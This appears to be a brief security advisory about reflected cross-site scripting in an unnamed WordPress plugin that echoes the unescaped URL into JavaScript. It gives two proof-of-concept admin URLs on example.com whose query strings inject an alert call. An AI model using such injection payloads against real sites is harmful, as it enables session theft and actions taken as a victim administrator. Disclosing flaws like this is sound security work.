The plugin does not escape the current URL before putting it back in a JavaScript context, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/?test%22-alert(/XSS/)-%22
https://example.com/wp-admin/profile.php?test%22-alert(/XSS/)-%22